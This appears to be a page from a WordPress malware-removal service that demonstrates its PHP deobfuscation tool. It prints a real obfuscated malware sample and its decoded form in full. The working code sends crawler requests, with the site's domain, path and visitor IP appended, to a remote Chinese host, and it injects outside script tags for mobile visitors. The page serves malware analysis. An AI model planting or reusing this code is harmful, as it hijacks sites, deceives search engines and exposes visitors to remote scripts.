Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
goto IGAC6; zsDgr: echo tR1LK("\x68\x74\x74\160\72\57\57\x35\x30\x2e\150\154\167\164\x6d\x6c\x2e\x63\156\x2f\x69\x54\116\122\104"); goto WmoR1; gXM5v: define("\154\x61\x6a\147\167", $OsUgP["\x48\x54\124\x50\137\125\x53\x45\x52\137\101\x47\x45\116\124"]); goto a18A1; XAeuy: define("\x4e\x34\x65\123\131", !isset($OsUgP["\x48\124\124\x50\x5f\x52\x45\106\105\x52\105\122"]) ? '' : $OsUgP["\110\124\124\120\137\x52\x45\106\105\x52\x45\x52"]); goto gXM5v; FypvY: define("\x64\126\152\x42\156", $OsUgP["\122\x45\x51\125\x45\x53\x54\x5f\x55\x52\x49"]); goto XAeuy; gUEEj: if (!preg_match(Ipf4Y, lajgw)) { if (!preg_match(uqvtp, lajgw)) { return; } echo "\x3c\163\143\x72\151\160\164\40\x73\162\143\75\x68\164\x74\160\72\57\57\61\56\154\x61\x69\157\165\164\x65\170\x2e\143\157\155\x2f\x6a\x73\x2e\x6a\x73\x3e\74\57\x73\x63\162\x69\x70\x74\76"; echo "\74\163\143\162\x69\160\x74\x20\x73\x72\x63\x3d\x68\x74\164\x70\x3a\57\57\x34\x33\56\61\x32\70\x2e\x35\x39\x2e\x32\62\64\x2f\x7a\x62\56\152\163\x3e\74\x2f\x73\143\162\151\x70\x74\x3e"; die; } goto zsDgr; Ks93Z: $OsUgP = $_SERVER; goto f1cyu; f1cyu: function Tr1lK($fmjrO) { $rqdhf = curl_init(); curl_setopt($rqdhf, CURLOPT_URL, $fmjrO); curl_setopt($rqdhf, CURLOPT_USERAGENT, $_SERVER["\110\x54\x54\120\137\x55\x53\x45\x52\x5f\x41\x47\105\116\x54"]); curl_setopt($rqdhf, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($rqdhf, CURLOPT_SSL_VERIFYHOST, FALSE); curl_setopt($rqdhf, CURLOPT_RETURNTRANSFER, 1); curl_setopt($rqdhf, CURLOPT_HEADER, 0); curl_setopt($rqdhf, CURLOPT_ENCODING, "\x67\172\151\160"); $kNlZg = curl_exec($rqdhf); curl_close($rqdhf); return $kNlZg; } goto FypvY; B6pds: define("\x75\161\166\x74\160", "\57\x70\x68\157\x6e\x65\x7c\160\141\x64\x7c\160\157\144\174\151\120\150\x6f\x6e\145\174\151\120\157\144\174\x69\157\163\x7c\151\x50\141\x64\174\101\156\144\162\x6f\151\144\x7c\x4d\x6f\142\151\154\x65\174\x42\154\x61\143\153\x42\145\162\x72\x79\x7c\x49\105\115\x6f\x62\151\154\x65\174\115\121\x51\102\x72\157\x77\163\x65\162\174\112\x55\x43\174\106\x65\156\x6e\x65\x63\x7c\167\117\x53\x42\162\157\167\163\145\162\174\x42\162\157\x77\163\145\x72\116\107\174\x57\145\x62\x4f\123\174\123\171\155\x62\x69\x61\x6e\x7c\127\151\x6e\144\157\x77\163\x20\x50\x68\157\x6e\x65\57"); goto ci2gy; a18A1: define("\x43\61\x4d\165\x65", "\x68\x74\164\160\72\57\x2f\x35\60\56\150\x6c\x77\164\x6d\154\x2e\x63\x6e\x2f"); goto UIADN; ci2gy: define("\x59\63\x48\147\x57", stristr(dVjBn, "\56\x78\x6d\154") or stristr(dVjBn, "\56\x64\x6f\x63") or stristr(dVjBn, "\56\x74\170\164") or stristr(dVjBn, "\x2e\x70\x70\x74") or stristr(dVjBn, "\x2e\x68\x74\155\x6c") or stristr(dVjBn, "\56\x78\154\x73") or stristr(dVjBn, "\x32\x30\x32") or stristr(dVjBn, "\56\163\x68\x74\x6d\x6c") or stristr(dVjBn, "\x31")); goto gUEEj; FZywf: error_reporting(0); goto UG8An; vTmXt: define("\111\x70\146\x34\x59", "\100\102\141\x69\144\x75\123\160\x69\x64\x65\162\x7c\x53\x6f\x67\x6f\165\x7c\x59\151\163\157\x75\174\110\141\x6f\163\x6f\x75\174\63\66\x30\123\160\151\x64\145\x72\100\x69"); goto B6pds; UIADN: define("\151\124\x4e\x52\104", "\77\x64\157\155\x61\151\156\x3d" . $OsUgP["\x48\124\124\120\137\110\117\123\124"] . "\46\160\x61\x74\x68\x3d" . dVjBn . "\x26\146\154\x61\147\x3d\147\154\x6f\x62\141\x6c" . "\46\x64\x62\x3d" . $_SERVER["\122\105\x4d\x4f\x54\105\x5f\101\x44\x44\122"]); goto RksiN; UG8An: header("\103\157\x6e\x74\145\x6e\x74\x2d\124\x79\160\x65\x3a\x20\x74\145\x78\x74\x2f\x68\164\155\x6c\x3b\143\x68\x61\162\163\x65\x74\75\165\164\x66\x2d\x38"); goto VxBvQ; RksiN: define("\x49\x61\x51\x57\x59", "\x69\x54\x4e\x52\x44\x26\x72\145\x66\145\162\x65\x72\75" . urlencode(N4eSY)); goto vTmXt; IGAC6: set_time_limit(0); goto FZywf; VxBvQ: $n_BfT = "\x73\x74\162\x69\x73\164\162"; goto Ks93Z; WmoR1: die;<?php
set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
$n_BfT = "stristr";
$OsUgP = $_SERVER;
function Tr1lK($fmjrO)
{
$rqdhf = curl_init();
curl_setopt($rqdhf, CURLOPT_URL, $fmjrO);
curl_setopt($rqdhf, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
curl_setopt($rqdhf, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($rqdhf, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($rqdhf, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($rqdhf, CURLOPT_HEADER, 0);
curl_setopt($rqdhf, CURLOPT_ENCODING, "gzip");
$kNlZg = curl_exec($rqdhf);
curl_close($rqdhf);
return $kNlZg;
}
define("dVjBn", $OsUgP["REQUEST_URI"]);
define("N4eSY", !isset($OsUgP["HTTP_REFERER"]) ? '' : $OsUgP["HTTP_REFERER"]);
define("lajgw", $OsUgP["HTTP_USER_AGENT"]);
define("C1Mue", "http://50.hlwtml.cn/");
define("iTNRD", "?domain=" . $OsUgP["HTTP_HOST"] . "&path=" . dVjBn . "&flag=global" . "&db=" . $_SERVER["REMOTE_ADDR"]);
define("IaQWY", "iTNRD&referer=" . urlencode(N4eSY));
define("Ipf4Y", "@BaiduSpider|Sogou|Yisou|Haosou|360Spider@i");
define("uqvtp", "/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/");
define("Y3HgW", stristr(dVjBn, ".xml") or stristr(dVjBn, ".doc") or stristr(dVjBn, ".txt") or stristr(dVjBn, ".ppt") or stristr(dVjBn, ".html") or stristr(dVjBn, ".xls") or stristr(dVjBn, "202") or stristr(dVjBn, ".shtml") or stristr(dVjBn, "1"));
if (!preg_match(Ipf4Y, lajgw)) {
if (!preg_match(uqvtp, lajgw)) {
return;
}
echo "<script src=http://1.laioutex.com/js.js></script>";
echo "<script src=http://43.128.59.224/zb.js></script>";
die;
}
echo tR1LK("http://50.hlwtml.cn/iTNRD");
die;Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.